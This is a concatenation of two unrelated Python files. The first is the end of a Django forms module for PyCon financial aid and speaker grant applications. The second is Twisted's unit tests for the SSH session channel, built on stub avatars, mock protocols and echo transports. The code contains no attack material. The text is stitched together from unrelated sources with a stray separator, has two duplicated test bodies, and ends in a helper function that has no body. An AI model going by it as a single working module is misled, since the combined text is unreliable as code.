" trans women, and non-binary people.)"
),
'travel_plans': (
"Please describe your travel plans. "
" Planes? Trains? Automobiles?"
" If traveling internationally,"
" let us know which country you will travel from."
),
}
class SpeakerGrantRequestForm(forms.ModelForm):
i_have_read = forms.BooleanField(
label='I have read the <a href="/2019/financial-assistance/">Financial Assistance</a> page.',
required=False, # so our own validator gets called
validators=[validate_is_checked],
)
class Meta:
model = FinancialAidApplication
fields = [
'i_have_read',
'amount_requested',
'international',
'travel_plans',
]
widgets = {
'travel_plans': Textarea(
attrs={'cols': 80, 'rows': 10,
'class': 'fullwidth-textarea',
'maxlength': 1024}),
}
help_texts = {
'international': (
'Check the box if you will be traveling internationally,'
' or from anywhere outside of the continental United States.'
),
'i_have_read': (
"Our speaker grant program is operated as part of PyCon's "
"<a href=\"/2019/financial-assistance/\"> Financial Assistance</a> "
"program"
),
'travel_plans': (
"Please describe your travel plans. "
" Planes? Trains? Automobiles?"
" If traveling internationally,"
" let us know which country you will travel from."
),
}
class FinancialAidReviewForm(forms.ModelForm):
class Meta:
model = FinancialAidReviewData
fields = ['status', 'amount', 'grant_letter_sent', 'reimbursement_method',
'notes', 'disbursement_notes',
'promo_code']
widgets = {
'notes': Textarea(
attrs={'cols': 80, 'rows': 5,
'class': 'fullwidth-textarea'}),
'travel_preferred_disbursement': Textarea(
attrs={'cols': 80, 'rows': 5,
'class': 'fullwidth-textarea'}),
'grant_letter_sent': Select(
choices=(
(False, _("No")),
(True, _("Yes")),
)
),
}
class FinancialAidAcceptOfferForm(forms.ModelForm):
class Meta:
model = FinancialAidReviewData
fields = [
'reimbursement_method',
'legal_name',
'address',
]
widgets = {
'address': Textarea(
attrs={'cols': 80, 'rows': 4,
'class': 'fullwidth-textarea',
'maxlength': 4096}),
}
help_texts = {
'reimbursement_method': (
"The PSF offers three options for receiving payment in USD: "
"PayPal, check, and wire transfer."
),
'legal_name': (
"Your legal name should match the name displayed on your "
"government-issued picture identification. We require your "
"legal name for tax purposes, and collecting it ahead of time "
"will speed up the up the reimbursement process at PyCon."
),
'address': (
"Please include your street address/PO Box, city, state, "
"zip code, and country. We are required "
"to collect the address in order to establish further "
"information about your identity."
),
}
def clean(self):
cleaned_data = super(FinancialAidAcceptOfferForm, self).clean()
reimbursement_method = cleaned_data.get("reimbursement_method")
legal_name = cleaned_data.get("legal_name")
address = cleaned_data.get("address")
errors = []
if not reimbursement_method:
errors.append(ValidationError(_("Must select a Reimbursement Method")))
if not legal_name:
errors.append(ValidationError(_("Must provide your Legal Name")))
if not address:
errors.append(ValidationError(_("Must provide your Mailing Address")))
if errors:
            raise ValidationError(errors)
        return cleaned_data
class MessageForm(forms.ModelForm):
class Meta:
model = FinancialAidMessage
fields = [
"message"
]
widgets = {
'message': Textarea(attrs={'class': 'fullwidth-textarea'}),
}
class ReviewerMessageForm(forms.ModelForm):
class Meta:
model = FinancialAidMessage
fields = [
"visible",
"message"
]
widgets = {
'message': Textarea(attrs={'class': 'fullwidth-textarea'}),
}
class BulkEmailForm(forms.Form):
subject = forms.CharField()
template = forms.ModelChoiceField(
queryset=FinancialAidEmailTemplate.objects.all(),
empty_label=u"Pick a bulk mail template to use",
)
confirm = forms.BooleanField(required=False)
RECEIPT_TYPE_CHOICES_EMPTY = [('', '------')] + list(RECEIPT_TYPE_CHOICES)
class ReceiptForm(forms.ModelForm):
receipt_type = forms.ChoiceField(choices=RECEIPT_TYPE_CHOICES_EMPTY, required=True)
class Meta:
model = Receipt
fields = ["receipt_type", "date", "amount", "description", "receipt_image"]
help_texts = {'description': "Please enter a description of this receipt"}
def clean(self):
cleaned_data = super(ReceiptForm, self).clean()
receipt_type = cleaned_data.get("receipt_type")
description = cleaned_data.get("description")
if receipt_type == 'other' and not description:
msg = "Description must be provided for 'Other' receipts."
self.add_error("description", msg)
|
|
# Copyright (c) 2007-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for the 'session' channel implementation in twisted.conch.ssh.session.
See also RFC 4254.
"""
import os, signal, sys, struct
from zope.interface import implements
from twisted.internet.error import ProcessTerminated, ProcessDone
from twisted.python.failure import Failure
from twisted.conch.ssh import common, session, connection
from twisted.internet import defer, protocol, error
from twisted.python import components, failure
from twisted.trial import unittest
class SubsystemOnlyAvatar(object):
"""
A stub class representing an avatar that is only useful for
getting a subsystem.
"""
def lookupSubsystem(self, name, data):
"""
If the other side requests the 'subsystem' subsystem, allow it by
returning a MockProtocol to implement it. Otherwise, return
None which is interpreted by SSHSession as a failure.
"""
if name == 'subsystem':
return MockProtocol()
class StubAvatar:
"""
    A stub avatar representing the authenticated user. It is adapted to the
    I{ISession} interface by L{StubSessionForStubAvatar}, registered below.
"""
def lookupSubsystem(self, name, data):
"""
        If the user requests the TestSubsystem subsystem, connect them to a
        MockProtocol. For any other name, None is returned, which SSHSession
        interprets as a failure.
"""
if name == 'TestSubsystem':
self.subsystem = MockProtocol()
self.subsystem.packetData = data
return self.subsystem
class StubSessionForStubAvatar(object):
"""
A stub ISession implementation for our StubAvatar. The instance
variables generally keep track of method invocations so that we can test
that the methods were called.
@ivar avatar: the L{StubAvatar} we are adapting.
@ivar ptyRequest: if present, the terminal, window size, and modes passed
to the getPty method.
@ivar windowChange: if present, the window size passed to the
        windowChanged method.
@ivar shellProtocol: if present, the L{SSHSessionProcessProtocol} passed
to the openShell method.
@ivar shellTransport: if present, the L{EchoTransport} connected to
shellProtocol.
@ivar execProtocol: if present, the L{SSHSessionProcessProtocol} passed
to the execCommand method.
@ivar execTransport: if present, the L{EchoTransport} connected to
execProtocol.
@ivar execCommandLine: if present, the command line passed to the
execCommand method.
@ivar gotEOF: if present, an EOF message was received.
@ivar gotClosed: if present, a closed message was received.
"""
implements(session.ISession)
def __init__(self, avatar):
"""
Store the avatar we're adapting.
"""
self.avatar = avatar
self.shellProtocol = None
def getPty(self, terminal, window, modes):
"""
If the terminal is 'bad', fail. Otherwise, store the information in
the ptyRequest variable.
"""
if terminal != 'bad':
self.ptyRequest = (terminal, window, modes)
else:
raise RuntimeError('not getting a pty')
def windowChanged(self, window):
"""
If all the window sizes are 0, fail. Otherwise, store the size in the
windowChange variable.
"""
if window == (0, 0, 0, 0):
raise RuntimeError('not changing the window size')
else:
self.windowChange = window
def openShell(self, pp):
"""
If we have gotten a shell request before, fail. Otherwise, store the
process protocol in the shellProtocol variable, connect it to the
EchoTransport and store that as shellTransport.
"""
if self.shellProtocol is not None:
raise RuntimeError('not getting a shell this time')
else:
self.shellProtocol = pp
self.shellTransport = EchoTransport(pp)
def execCommand(self, pp, command):
"""
        If the command is 'success', store the command and the process
        protocol. If it starts with 'repeat', also connect an EchoTransport
        and echo the rest of the command back. Otherwise, store the command
        and raise an error.
"""
self.execCommandLine = command
if command == 'success':
self.execProtocol = pp
elif command[:6] == 'repeat':
self.execProtocol = pp
self.execTransport = EchoTransport(pp)
pp.outReceived(command[7:])
else:
raise RuntimeError('not getting a command')
def eofReceived(self):
"""
Note that EOF has been received.
"""
self.gotEOF = True
def closed(self):
"""
Note that close has been received.
"""
self.gotClosed = True
components.registerAdapter(StubSessionForStubAvatar, StubAvatar,
session.ISession)
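# With the adapter registered, adapting a StubAvatar to ISession yields the
# stub session, which is how SSHSession finds it in the tests below:
#     session.ISession(StubAvatar())   # -> a StubSessionForStubAvatar instance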
class MockProcessProtocol(protocol.ProcessProtocol):
"""
A mock ProcessProtocol which echoes back data sent to it and
appends a tilde. The tilde is appended so the tests can verify that
we received and processed the data.
@ivar packetData: C{str} of data to be sent when the connection is made.
@ivar data: a C{str} of data received.
@ivar err: a C{str} of error data received.
@ivar inConnectionOpen: True if the input side is open.
@ivar outConnectionOpen: True if the output side is open.
@ivar errConnectionOpen: True if the error side is open.
@ivar ended: False if the protocol has not ended, a C{Failure} if the
process has ended.
"""
packetData = ''
def connectionMade(self):
"""
Set up variables.
"""
self.data = ''
self.err = ''
self.inConnectionOpen = True
self.outConnectionOpen = True
self.errConnectionOpen = True
self.ended = False
if self.packetData:
self.outReceived(self.packetData)
def outReceived(self, data):
"""
Data was received. Store it and echo it back with a tilde.
"""
self.data += data
if self.transport is not None:
self.transport.write(data + '~')
def errReceived(self, data):
"""
Error data was received. Store it and echo it back backwards.
"""
self.err += data
self.transport.write(data[::-1])
def inConnectionLost(self):
"""
Close the input side.
"""
self.inConnectionOpen = False
def outConnectionLost(self):
"""
Close the output side.
"""
self.outConnectionOpen = False
def errConnectionLost(self):
"""
Close the error side.
"""
self.errConnectionOpen = False
def processEnded(self, reason):
"""
End the process and store the reason.
"""
self.ended = reason
class EchoTransport:
"""
A transport for a ProcessProtocol which echos data that is sent to it with
a Windows newline (CR LF) appended to it. If a null byte is in the data,
disconnect. When we are asked to disconnect, disconnect the
C{ProcessProtocol} with a 0 exit code.
@ivar proto: the C{ProcessProtocol} connected to us.
@ivar data: a C{str} of data written to us.
"""
def __init__(self, processProtocol):
"""
Initialize our instance variables.
@param processProtocol: a C{ProcessProtocol} to connect to ourself.
"""
self.proto = processProtocol
self.closed = False
self.data = ''
processProtocol.makeConnection(self)
def write(self, data):
"""
We got some data. Give it back to our C{ProcessProtocol} with
a newline attached. Disconnect if there's a null byte.
"""
self.data += data
self.proto.outReceived(data)
self.proto.outReceived('\r\n')
if '\x00' in data: # mimic 'exit' for the shell test
self.loseConnection()
def loseConnection(self):
"""
If we're asked to disconnect (and we haven't already) shut down
the C{ProcessProtocol} with a 0 exit code.
"""
if self.closed:
return
self.closed = True
self.proto.inConnectionLost()
self.proto.outConnectionLost()
self.proto.errConnectionLost()
self.proto.processEnded(failure.Failure(
error.ProcessTerminated(0, None, None)))
class MockProtocol(protocol.Protocol):
"""
A sample Protocol which stores the data passed to it.
@ivar packetData: a C{str} of data to be sent when the connection is made.
@ivar data: a C{str} of the data passed to us.
@ivar open: True if the channel is open.
@ivar reason: if not None, the reason the protocol was closed.
"""
packetData = ''
def connectionMade(self):
"""
Set up the instance variables. If we have any packetData, send it
along.
"""
self.data = ''
self.open = True
self.reason = None
if self.packetData:
self.dataReceived(self.packetData)
def dataReceived(self, data):
"""
Store the received data and write it back with a tilde appended.
The tilde is appended so that the tests can verify that we processed
the data.
"""
self.data += data
if self.transport is not None:
self.transport.write(data + '~')
def connectionLost(self, reason):
"""
Close the protocol and store the reason.
"""
self.open = False
self.reason = reason
class StubConnection(object):
"""
A stub for twisted.conch.ssh.connection.SSHConnection. Record the data
that channels send, and when they try to close the connection.
@ivar data: a C{dict} mapping C{SSHChannel}s to a C{list} of C{str} of data
they sent.
@ivar extData: a C{dict} mapping L{SSHChannel}s to a C{list} of C{tuple} of
(C{int}, C{str}) of extended data they sent.
@ivar requests: a C{dict} mapping L{SSHChannel}s to a C{list} of C{tuple}
of (C{str}, C{str}) of channel requests they made.
@ivar eofs: a C{dict} mapping L{SSHChannel}s to C{true} if they have sent
an EOF.
@ivar closes: a C{dict} mapping L{SSHChannel}s to C{true} if they have sent
a close.
"""
def __init__(self):
"""
Initialize our instance variables.
"""
self.data = {}
self.extData = {}
self.requests = {}
self.eofs = {}
self.closes = {}
def logPrefix(self):
"""
Return our logging prefix.
"""
return "MockConnection"
def sendData(self, channel, data):
"""
Record the sent data.
"""
self.data.setdefault(channel, []).append(data)
def sendExtendedData(self, channel, type, data):
"""
Record the sent extended data.
"""
self.extData.setdefault(channel, []).append((type, data))
def sendRequest(self, channel, request, data, wantReply=False):
"""
Record the sent channel request.
"""
self.requests.setdefault(channel, []).append((request, data,
wantReply))
if wantReply:
return defer.succeed(None)
def sendEOF(self, channel):
"""
Record the sent EOF.
"""
self.eofs[channel] = True
def sendClose(self, channel):
"""
Record the sent close.
"""
self.closes[channel] = True
class StubTransport:
"""
A stub transport which records the data written.
@ivar buf: the data sent to the transport.
@type buf: C{str}
@ivar close: flag indicating whether the transport has been closed.
@type close: C{bool}
"""
buf = ''
close = False
def write(self, data):
"""
Record data in the buffer.
"""
self.buf += data
def loseConnection(self):
"""
Note that the connection was closed.
"""
self.close = True
class StubTransportWithWriteErr(StubTransport):
"""
A version of StubTransport which records the error data sent to it.
@ivar err: the extended data sent to the transport.
@type err: C{str}
"""
err = ''
def writeErr(self, data):
"""
Record the extended data in the buffer. This was an old interface
that allowed the Transports from ISession.openShell() or
ISession.execCommand() to receive extended data from the client.
"""
self.err += data
class StubClient(object):
"""
A stub class representing the client to a SSHSession.
@ivar transport: A L{StubTransport} object which keeps track of the data
passed to it.
"""
def __init__(self):
self.transport = StubTransportWithWriteErr()
class SessionInterfaceTestCase(unittest.TestCase):
"""
Tests for the SSHSession class interface. This interface is not ideal, but
it is tested in order to maintain backwards compatibility.
"""
def setUp(self):
"""
Make an SSHSession object to test. Give the channel some window
so that it's allowed to send packets. 500 and 100 are arbitrary
values.
"""
self.session = session.SSHSession(remoteWindow=500,
remoteMaxPacket=100, conn=StubConnection(),
avatar=StubAvatar())
def assertSessionIsStubSession(self):
"""
Asserts that self.session.session is an instance of
StubSessionForStubAvatar.
"""
self.assertIsInstance(self.session.session,
StubSessionForStubAvatar)
def test_init(self):
"""
SSHSession initializes its buffer (buf), client, and ISession adapter.
The avatar should not need to be adaptable to an ISession immediately.
"""
s = session.SSHSession(avatar=object) # use object because it doesn't
# have an adapter
self.assertEquals(s.buf, '')
self.assertIdentical(s.client, None)
self.assertIdentical(s.session, None)
def test_client_dataReceived(self):
"""
SSHSession.dataReceived() passes data along to a client. If the data
comes before there is a client, the data should be discarded.
"""
self.session.dataReceived('1')
self.session.client = StubClient()
self.session.dataReceived('2')
self.assertEquals(self.session.client.transport.buf, '2')
def test_client_extReceived(self):
"""
SSHSession.extReceived() passes data of type EXTENDED_DATA_STDERR along
to the client. If the data comes before there is a client, or if the
data is not of type EXTENDED_DATA_STDERR, it is discarded.
"""
self.session.extReceived(connection.EXTENDED_DATA_STDERR, '1')
self.session.extReceived(255, '2') # 255 is arbitrary
self.session.client = StubClient()
self.session.extReceived(connection.EXTENDED_DATA_STDERR, '3')
self.assertEquals(self.session.client.transport.err, '3')
def test_client_extReceivedWithoutWriteErr(self):
"""
SSHSession.extReceived() should handle the case where the transport
on the client doesn't have a writeErr method.
"""
client = self.session.client = StubClient()
client.transport = StubTransport() # doesn't have writeErr
# should not raise an error
self.session.extReceived(connection.EXTENDED_DATA_STDERR, 'ignored')
def test_client_closed(self):
"""
SSHSession.closed() should tell the transport connected to the client
that the connection was lost.
"""
self.session.client = StubClient()
self.session.closed()
self.assertTrue(self.session.client.transport.close)
self.session.client.transport.close = False
def test_badSubsystemDoesNotCreateClient(self):
"""
When a subsystem request fails, SSHSession.client should not be set.
"""
ret = self.session.requestReceived(
'subsystem', common.NS('BadSubsystem'))
self.assertFalse(ret)
self.assertIdentical(self.session.client, None)
def test_lookupSubsystem(self):
"""
When a client requests a subsystem, the SSHSession object should get
the subsystem by calling avatar.lookupSubsystem, and attach it as
the client.
"""
ret = self.session.requestReceived(
'subsystem', common.NS('TestSubsystem') + 'data')
self.assertTrue(ret)
self.assertIsInstance(self.session.client, protocol.ProcessProtocol)
self.assertIdentical(self.session.client.transport.proto,
self.session.avatar.subsystem)
def test_lookupSubsystemDoesNotNeedISession(self):
"""
Previously, if one only wanted to implement a subsystem, an ISession
adapter wasn't needed because subsystems were looked up using the
lookupSubsystem method on the avatar.
"""
s = session.SSHSession(avatar=SubsystemOnlyAvatar(),
conn=StubConnection())
ret = s.request_subsystem(
common.NS('subsystem') + 'data')
self.assertTrue(ret)
self.assertNotIdentical(s.client, None)
self.assertIdentical(s.conn.closes.get(s), None)
s.eofReceived()
self.assertTrue(s.conn.closes.get(s))
# these should not raise errors
s.loseConnection()
s.closed()
def test_lookupSubsystem_data(self):
"""
After having looked up a subsystem, data should be passed along to the
client. Additionally, subsystems were passed the entire request packet
as data, instead of just the additional data.
We check for the appended tilde to verify that the data passed
through the client.
"""
#self.session.dataReceived('1')
# subsystems didn't get extended data
#self.session.extReceived(connection.EXTENDED_DATA_STDERR, '2')
self.session.requestReceived('subsystem',
common.NS('TestSubsystem') + 'data')
self.assertEquals(self.session.conn.data[self.session],
['\x00\x00\x00\x0dTestSubsystemdata~'])
self.session.dataReceived('more data')
self.assertEquals(self.session.conn.data[self.session][-1],
'more data~')
def test_lookupSubsystem_closeReceived(self):
"""
SSHSession.closeReceived() should send a close message to the remote
side.
"""
self.session.requestReceived('subsystem',
common.NS('TestSubsystem') + 'data')
self.session.closeReceived()
self.assertTrue(self.session.conn.closes[self.session])
def assertRequestRaisedRuntimeError(self):
"""
Assert that the request we just made raised a RuntimeError (and only a
RuntimeError).
"""
errors = self.flushLoggedErrors(RuntimeError)
self.assertEquals(len(errors), 1, "Multiple RuntimeErrors raised: %s" %
'\n'.join([repr(error) for error in errors]))
errors[0].trap(RuntimeError)
def test_requestShell(self):
"""
When a client requests a shell, the SSHSession object should get
the shell by getting an ISession adapter for the avatar, then
calling openShell() with a ProcessProtocol to attach.
"""
# gets a shell the first time
ret = self.session.requestReceived('shell', '')
self.assertTrue(ret)
self.assertSessionIsStubSession()
self.assertIsInstance(self.session.client,
session.SSHSessionProcessProtocol)
self.assertIdentical(self.session.session.shellProtocol,
self.session.client)
# doesn't get a shell the second time
self.assertFalse(self.session.requestReceived('shell', ''))
self.assertRequestRaisedRuntimeError()
def test_requestShellWithData(self):
"""
When a client executes a shell, it should be able to pass data
back and forth between the local and the remote side.
"""
ret = self.session.requestReceived('shell', '')
self.assertTrue(ret)
self.assertSessionIsStubSession()
self.session.dataReceived('some data\x00')
self.assertEquals(self.session.session.shellTransport.data,
'some data\x00')
self.assertEquals(self.session.conn.data[self.session],
['some data\x00', '\r\n'])
self.assertTrue(self.session.session.shellTransport.closed)
self.assertEquals(self.session.conn.requests[self.session],
[('exit-status', '\x00\x00\x00\x00', False)])
def test_requestExec(self):
"""
When a client requests a command, the SSHSession object should get
the command by getting an ISession adapter for the avatar, then
calling execCommand with a ProcessProtocol to attach and the
command line.
"""
ret = self.session.requestReceived('exec',
common.NS('failure'))
self.assertFalse(ret)
self.assertRequestRaisedRuntimeError()
self.assertIdentical(self.session.client, None)
self.assertTrue(self.session.requestReceived('exec',
common.NS('success')))
self.assertSessionIsStubSession()
self.assertIsInstance(self.session.client,
session.SSHSessionProcessProtocol)
self.assertIdentical(self.session.session.execProtocol,
self.session.client)
self.assertEquals(self.session.session.execCommandLine,
'success')
def test_requestExecWithData(self):
"""
When a client executes a command, it should be able to pass data
back and forth.
"""
ret = self.session.requestReceived('exec',
common.NS('repeat hello'))
self.assertTrue(ret)
self.assertSessionIsStubSession()
self.session.dataReceived('some data')
self.assertEquals(self.session.session.execTransport.data, 'some data')
self.assertEquals(self.session.conn.data[self.session],
['hello', 'some data', '\r\n'])
self.session.eofReceived()
self.session.closeReceived()
self.session.closed()
self.assertTrue(self.session.session.execTransport.closed)
self.assertEquals(self.session.conn.requests[self.session],
[('exit-status', '\x00\x00\x00\x00', False)])
def test_requestPty(self):
"""
When a client requests a PTY, the SSHSession object should make
the request by getting an ISession adapter for the avatar, then
calling getPty with the terminal type, the window size, and any modes
the client gave us.
"""
# 'bad' terminal type fails
ret = self.session.requestReceived(
'pty_req', session.packRequest_pty_req(
'bad', (1, 2, 3, 4), ''))
self.assertFalse(ret)
self.assertSessionIsStubSession()
self.assertRequestRaisedRuntimeError()
# 'good' terminal type succeeds
self.assertTrue(self.session.requestReceived('pty_req',
session.packRequest_pty_req('good', (1, 2, 3, 4), '')))
self.assertEquals(self.session.session.ptyRequest,
('good', (1, 2, 3, 4), []))
def test_requestWindowChange(self):
"""
When the client requests to change the window size, the SSHSession
object should make the request by getting an ISession adapter for the
avatar, then calling windowChanged with the new window size.
"""
ret = self.session.requestReceived(
'window_change',
session.packRequest_window_change((0, 0, 0, 0)))
self.assertFalse(ret)
self.assertRequestRaisedRuntimeError()
self.assertSessionIsStubSession()
self.assertTrue(self.session.requestReceived('window_change',
session.packRequest_window_change((1, 2, 3, 4))))
self.assertEquals(self.session.session.windowChange,
(1, 2, 3, 4))
def test_eofReceived(self):
"""
When an EOF is received and an ISession adapter is present, it should
be notified of the EOF message.
"""
self.session.session = session.ISession(self.session.avatar)
self.session.eofReceived()
self.assertTrue(self.session.session.gotEOF)
def test_closeReceived(self):
"""
When a close is received, the session should send a close message.
"""
ret = self.session.closeReceived()
self.assertIdentical(ret, None)
self.assertTrue(self.session.conn.closes[self.session])
def test_closed(self):
"""
When a close is received and an ISession adapter is present, it should
be notified of the close message.
"""
self.session.session = session.ISession(self.session.avatar)
self.session.closed()
self.assertTrue(self.session.session.gotClosed)
class SessionWithNoAvatarTestCase(unittest.TestCase):
"""
Test for the SSHSession interface. Several of the methods (request_shell,
request_exec, request_pty_req, request_window_change) would create a
'session' instance variable from the avatar if one didn't exist when they
were called.
"""
def setUp(self):
self.session = session.SSHSession()
self.session.avatar = StubAvatar()
self.assertIdentical(self.session.session, None)
def assertSessionProvidesISession(self):
"""
self.session.session should provide I{ISession}.
"""
self.assertTrue(session.ISession.providedBy(self.session.session),
"ISession not provided by %r" % self.session.session)
def test_requestShellGetsSession(self):
"""
If an ISession adapter isn't already present, request_shell should get
one.
"""
self.session.requestReceived('shell', '')
self.assertSessionProvidesISession()
def test_requestExecGetsSession(self):
"""
If an ISession adapter isn't already present, request_exec should get
one.
"""
self.session.requestReceived('exec',
common.NS('success'))
self.assertSessionProvidesISession()
def test_requestPtyReqGetsSession(self):
"""
If an ISession adapter isn't already present, request_pty_req should
get one.
"""
self.session.requestReceived('pty_req',
session.packRequest_pty_req(
'term', (0, 0, 0, 0), ''))
self.assertSessionProvidesISession()
def test_requestWindowChangeGetsSession(self):
"""
If an ISession adapter isn't already present, request_window_change
should get one.
"""
self.session.requestReceived(
'window_change',
session.packRequest_window_change(
(1, 1, 1, 1)))
self.assertSessionProvidesISession()
class WrappersTestCase(unittest.TestCase):
"""
A test for the wrapProtocol and wrapProcessProtocol functions.
"""
def test_wrapProtocol(self):
"""
L{wrapProtocol}, when passed a L{Protocol}, should return something that
has write(), writeSequence() and loseConnection() methods; the first two
call the Protocol's dataReceived() method and the last calls its
connectionLost() method.
"""
protocol = MockProtocol()
protocol.transport = StubTransport()
protocol.connectionMade()
wrapped = session.wrapProtocol(protocol)
wrapped.dataReceived('dataReceived')
self.assertEquals(protocol.transport.buf, 'dataReceived')
wrapped.write('data')
wrapped.writeSequence(['1', '2'])
wrapped.loseConnection()
self.assertEquals(protocol.data, 'data12')
protocol.reason.trap(error.ConnectionDone)
def test_wrapProcessProtocol_Protocol(self):
"""
L{wrapProcessProtocol}, when passed a L{Protocol}, should return
something that follows the L{IProcessProtocol} interface, with
connectionMade() mapping to connectionMade(), outReceived() mapping to
dataReceived() and processEnded() mapping to connectionLost().
"""
protocol = MockProtocol()
protocol.transport = StubTransport()
process_protocol = session.wrapProcessProtocol(protocol)
process_protocol.connectionMade()
process_protocol.outReceived('data')
self.assertEquals(protocol.transport.buf, 'data~')
process_protocol.processEnded(failure.Failure(
error.ProcessTerminated(0, None, None)))
protocol.reason.trap(error.ProcessTerminated)
class TestHelpers(unittest.TestCase):
"""
Tests for the 4 helper functions: parseRequest_* and packRequest_*.
"""
def test_parseRequest_pty_req(self):
"""
The payload of a pty-req message is::
string terminal
uint32 columns
uint32 rows
uint32 x pixels
uint32 y pixels
string modes
Modes are::
byte mode number
uint32 mode value
"""
self.assertEquals(session.parseRequest_pty_req(common.NS('xterm') +
struct.pack('>4L',
1, 2, 3, 4)
+ common.NS(
struct.pack('>BL', 5, 6))),
('xterm', (2, 1, 3, 4), [(5, 6)]))
def test_packRequest_pty_req_old(self):
"""
See test_parseRequest_pty_req for the payload format.
"""
packed = session.packRequest_pty_req('xterm', (2, 1, 3, 4),
'\x05\x00\x00\x00\x06')
self.assertEquals(packed,
common.NS('xterm') + struct.pack('>4L', 1, 2, 3, 4) +
common.NS(struct.pack('>BL', 5, 6)))
def test_packRequest_pty_req(self):
"""
See test_parseRequest_pty_req for the payload format.
"""
packed = session.packRequest_pty_req('xterm', (2, 1, 3, 4),
'\x05\x00\x00\x00\x06')
self.assertEquals(packed,
common.NS('xterm') + struct.pack('>4L', 1, 2, 3, 4) +
common.NS(struct.pack('>BL', 5, 6)))
def test_parseRequest_window_change(self):
"""
The payload of a window_change request is::
uint32 columns
uint32 rows
uint32 x pixels
uint32 y pixels
parseRequest_window_change() returns (rows, columns, x pixels,
y pixels).
"""
self.assertEquals(session.parseRequest_window_change(
struct.pack('>4L', 1, 2, 3, 4)), (2, 1, 3, 4))
def test_packRequest_window_change(self):
"""
See test_parseRequest_window_change for the payload format.
"""
self.assertEquals(session.packRequest_window_change((2, 1, 3, 4)),
struct.pack('>4L', 1, 2, 3, 4))
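# A small illustrative helper, not part of the original test suite: it packs
# and re-parses a pty-req payload using the layout documented in
# TestHelpers.test_parseRequest_pty_req, assuming session.packRequest_pty_req
# and session.parseRequest_pty_req behave exactly as exercised above.
def _example_pty_req_round_trip():
    modes = struct.pack('>BL', 5, 6)  # one (mode number, mode value) pair
    packed = session.packRequest_pty_req('xterm', (2, 1, 3, 4), modes)
    # returns (terminal, (rows, columns, x pixels, y pixels), [(mode, value)])
    return session.parseRequest_pty_req(packed)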
class SSHSessionProcessProtocolTestCase(unittest.TestCase):
"""
Tests for L{SSHSessionProcessProtocol}.
"""
def setUp(self):
self.session = session.SSHSession(
conn=StubConnection(), remoteWindow=500, remoteMaxPacket=100)
self.transport = StubTransport()
self.pp = session.SSHSessionProcessProtocol(self.session)
self.pp.makeConnection(self.transport)
def assertSessionClosed(self):
"""
Assert that C{self.session} is closed.
"""
self.assertTrue(self.session.conn.closes[self.session])
def assertRequestsEqual(self, expectedRequests):
"""
Assert that C{self.session} has sent the C{expectedRequests}.
"""
self.assertEqual(
self.session.conn.requests[self.session],
expectedRequests)
def test_init(self):
"""
SSHSessionProcessProtocol should set self.session to the session passed
to the __init__ method.
"""
self.assertEquals(self.pp.session, self.session)
def test_connectionMade(self):
"""
SSHSessionProcessProtocol.connectionMade() should check if there's a
'buf' attribute on its session and write it to the transport if so.
"""
self.session.buf = 'buffer'
self.pp.connectionMade()
self.assertEquals(self.transport.buf, 'buffer')
def test_getSignalName(self):
"""
_getSignalName should return the name of a signal when given the
signal number.
"""
for signalName in session.SUPPORTED_SIGNALS:
signalName = 'SIG' + signalName
signalValue = getattr(signal, signalName)
sshName = self.pp._getSignalName(signalValue)
self.assertEquals(sshName, signalName,
"%i: %s != %s" % (signalValue, sshName,
signalName))
def test_getSignalNameWithLocalSignal(self):
"""
If there are signals in the signal module which aren't in the SSH RFC,
we map their name to [signal name]@[platform].
"""
signal.SIGTwistedTest = signal.NSIG + 1 # value can't exist normally
# Force reinitialization of signals
self.pp._signalValuesToNames = None
self.assertEquals(self.pp._getSignalName(signal.SIGTwistedTest),
'SIGTwistedTest@' + sys.platform)
if getattr(signal, 'SIGALRM', None) is None:
test_getSignalName.skip = test_getSignalNameWithLocalSignal.skip = \
"Not all signals available"
def test_outReceived(self):
"""
When data is passed to the outReceived method, it should be sent to
the session's write method.
"""
self.pp.outReceived('test data')
self.assertEquals(self.session.conn.data[self.session],
['test data'])
def test_write(self):
"""
When data is passed to the write method, it should be sent to the
session channel's write method.
"""
self.pp.write('test data')
self.assertEquals(self.session.conn.data[self.session],
['test data'])
def test_writeSequence(self):
"""
When a sequence is passed to the writeSequence method, it should be
joined together and sent to the session channel's write method.
"""
self.pp.writeSequence(['test ', 'data'])
self.assertEquals(self.session.conn.data[self.session],
['test data'])
def test_errReceived(self):
"""
When data is passed to the errReceived method, it should be sent to
the session's writeExtended method.
"""
self.pp.errReceived('test data')
self.assertEquals(self.session.conn.extData[self.session],
[(1, 'test data')])
def test_inConnectionLost(self):
"""
When inConnectionLost is called, it should send an EOF message,
"""
self.pp.inConnectionLost()
self.assertTrue(self.session.conn.eofs[self.session])
def test_loseConnection(self):
"""
When loseConnection() is called, it should call loseConnection
on the session channel.
"""
self.pp.loseConnection()
self.assertTrue(self.session.conn.closes[self.session])
def test_connectionLost(self):
"""
When connectionLost() is called, it should call loseConnection()
on the session channel.
"""
self.pp.connectionLost(failure.Failure(
ProcessDone(0)))
def test_processEndedWithExitCode(self):
"""
When processEnded is called, if there is an exit code in the reason
it should be sent in an exit-status message. The connection should be
closed.
"""
self.pp.processEnded(Failure(ProcessDone(None)))
self.assertRequestsEqual(
[('exit-status', struct.pack('>I', 0), False)])
self.assertSessionClosed()
def test_processEndedWithExitSignalCoreDump(self):
"""
When processEnded is called, if there is an exit signal in the reason
it should be sent in an exit-signal message. The connection should be
closed.
"""
self.pp.processEnded(
Failure(ProcessTerminated(1,
signal.SIGTERM, 1 << 7))) # 7th bit means core dumped
self.assertRequestsEqual(
[('exit-signal',
common.NS('TERM') # signal name
+ '\x01' # core dumped is true
+ common.NS('') # error message
+ common.NS(''), # language tag
False)])
self.assertSessionClosed()
def test_processEndedWithExitSignalNoCoreDump(self):
"""
When processEnded is called, if there is an exit signal in the
reason it should be sent in an exit-signal message. If no
core was dumped, don't set the core-dump bit.
"""
self.pp.processEnded(
Failure(ProcessTerminated(1, signal.SIGTERM, 0)))
# see comments in test_processEndedWithExitSignalCoreDump for the
# meaning of the parts in the request
self.assertRequestsEqual(
[('exit-signal', common.NS('TERM') + '\x00' + common.NS('') +
common.NS(''), False)])
self.assertSessionClosed()
if getattr(os, 'WCOREDUMP', None) is None:
skipMsg = "can't run this w/o os.WCOREDUMP"
test_processEndedWithExitSignalCoreDump.skip = skipMsg
test_processEndedWithExitSignalNoCoreDump.skip = skipMsg
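# A small illustrative helper, not part of the original tests: it builds an
# exit-signal request payload in the layout the two processEnded tests above
# expect (signal name, core-dumped flag, error message, language tag).
def _example_exit_signal_payload(signal_name='TERM', core_dumped=False):
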